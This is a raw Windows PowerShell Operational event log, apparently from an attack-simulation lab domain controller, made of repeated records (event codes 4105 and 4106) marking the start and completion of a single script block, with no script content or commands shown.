Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472763
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472762
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472761
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472760
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472759
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472758
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472757
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472756
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472755
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472754
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472753
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472752
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472751
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472750
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472749
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472748
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472747
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472746
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472745
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472744
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472743
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472742
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472741
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472740
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472739
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472738
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472737
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472736
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472735
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472734
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472733
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472732
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472731
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472730
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472729
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472728
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472727
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472726
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472725
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472724
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472723
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472722
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472721
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472720
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472719
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472718
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472717
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472716
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472715
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472714
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472713
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472712
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472711
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472710
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472709
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
